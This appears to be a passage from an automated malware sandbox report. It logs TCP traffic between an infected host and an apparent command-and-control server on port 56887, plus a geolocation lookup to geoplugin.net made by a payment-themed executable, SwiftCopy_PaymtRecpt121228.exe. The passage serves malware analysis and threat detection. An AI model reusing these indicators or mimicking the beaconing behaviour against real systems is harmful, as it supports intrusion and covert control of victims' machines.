                                                  Dec 17, 2024 16:40:28.917920113 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:29.418440104 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:29.862113953 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:29.918515921 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:29.981654882 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.130887032 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.188268900 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:30.190356970 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:30.309812069 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.309830904 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.309845924 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.309916019 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.309927940 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.312172890 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.312186956 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.312208891 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.312222004 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.315263033 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.315274954 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.315350056 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.315362930 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.315692902 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.319870949 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.319884062 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.319956064 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.319967985 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.322469950 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.324167967 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.324181080 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.327279091 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.449671030 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:30.570394039 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.783170938 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.852981091 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:30.854662895 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:30.974481106 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975157022 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975188017 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975239038 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975265980 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975378036 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975526094 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975553989 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975660086 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975691080 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975774050 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975801945 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975828886 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975862026 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975913048 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.975940943 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976085901 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976113081 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976188898 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976329088 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976356983 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:30.976386070 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.466850042 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:31.587110043 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.797420979 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.843327045 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:31.844620943 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:31.964071989 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.964118004 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.964124918 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.964708090 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.964864016 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.965399981 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.965545893 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.965573072 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.965600967 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.965717077 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.965744019 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.965816975 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.965928078 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.965955973 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.966047049 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.966074944 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.966108084 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.966123104 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.966146946 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.966159105 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.966223955 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:31.966236115 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:32.471637011 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:32.591406107 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:32.801538944 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:32.846374035 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:32.881601095 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:32.882971048 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:33.001528978 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.001594067 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.001646996 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.001676083 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.001729965 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.001758099 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.001863003 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.001890898 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002019882 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002063990 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002146006 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002173901 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002223015 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002249956 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002554893 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002641916 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002692938 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002722025 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002819061 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002846956 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.002880096 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.003005981 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.487481117 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:33.607301950 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.817738056 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.861979961 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:33.871093035 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:33.879163027 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:33.991542101 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991585016 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991614103 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991684914 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991715908 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991744041 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991770983 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991797924 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991826057 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991852999 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991879940 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991911888 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991939068 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.991966009 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.998931885 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.998960018 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.999011993 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.999038935 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.999090910 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.999118090 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.999149084 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.999291897 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:33.999344110 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:34.503012896 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:34.673235893 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:34.885915995 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:34.926609039 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:34.927856922 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:35.046247005 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046263933 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046279907 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046344995 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046380997 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046442032 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046478033 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046566010 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046670914 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046736956 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046780109 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046792030 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046863079 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.046880960 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.047347069 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.047373056 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.047517061 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.047529936 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.047544003 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.047602892 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.047643900 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.048134089 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.518788099 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:35.638653040 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.850617886 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:35.893233061 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:35.893913031 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:35.896212101 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:36.014189959 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014205933 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014409065 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014420033 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014437914 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014446974 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014674902 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014724970 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014817953 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014837980 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014980078 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.014988899 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.015125036 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.015134096 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.016304016 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.016314030 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.016447067 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.016489029 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.016592979 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.016602039 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.016712904 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.016822100 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.534182072 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:36.653970003 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.863908052 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:36.908900976 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:36.910228014 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:36.911545038 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:37.029874086 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.029886961 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030044079 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030103922 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030144930 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030188084 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030266047 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030287027 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030421972 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030441999 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030556917 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030575991 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030658007 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.030678034 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.031110048 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.031269073 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.031562090 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.549710035 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:37.669373035 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.880279064 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:37.920690060 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:37.921958923 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:38.040755033 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.040782928 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.040860891 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041006088 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041014910 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041086912 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041162968 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041172981 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041181087 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041305065 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041313887 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041409969 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041430950 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041440964 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.041979074 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.042160034 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.042273998 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.042304993 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.042399883 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.344942093 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.354083061 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:38.474859953 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:38.565336943 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:38.971414089 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:38.995392084 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.091650009 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.209445000 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.251030922 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:39.252337933 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:39.371968985 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.372009039 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.372118950 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.372225046 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.372320890 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.372375011 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.372621059 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.372648954 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373034954 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373063087 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373090029 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373116970 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373226881 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373255014 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373368979 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373397112 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373483896 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373605013 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.373637915 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.581152916 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:39.702327967 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:39.965882063 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.018270016 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:40.065359116 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.065639019 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:40.065897942 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.066255093 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:40.100613117 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:40.101727962 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:40.101965904 CET4998756887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:40.220360994 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220407009 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220439911 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220449924 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220468998 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220540047 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220549107 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220563889 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220576048 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220788002 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220819950 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220892906 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.220905066 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221077919 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221324921 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221391916 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221401930 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221457958 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221467972 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221658945 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221730947 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221797943 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.221807957 CET5688749987192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:40:40.597322941 CET4998656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:40:40.718175888 CET5688749986192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:41:08.477408886 CET5688749706192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:41:08.478424072 CET4970656887192.168.2.5192.210.150.17
                                                  Dec 17, 2024 16:41:08.598305941 CET5688749706192.210.150.17192.168.2.5

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 17, 2024 16:37:05.777872086 CET5082553192.168.2.51.1.1.1
                                                  Dec 17, 2024 16:37:05.917876959 CET53508251.1.1.1192.168.2.5

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 17, 2024 16:37:05.777872086 CET192.168.2.51.1.1.10x9a7aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 17, 2024 16:37:05.917876959 CET1.1.1.1192.168.2.50x9a7aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • geoplugin.net

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.549708178.237.33.50807664C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 17, 2024 16:37:06.047321081 CET71OUTGET /json.gp HTTP/1.1
                                                  Host: geoplugin.net
                                                  Cache-Control: no-cache
                                                  Dec 17, 2024 16:37:07.329452038 CET1171INHTTP/1.1 200 OK
                                                  date: Tue, 17 Dec 2024 15:37:07 GMT
                                                  server: Apache
                                                  content-length: 963
                                                  content-type: application/json; charset=utf-8
                                                  cache-control: public, max-age=300
                                                  access-control-allow-origin: *
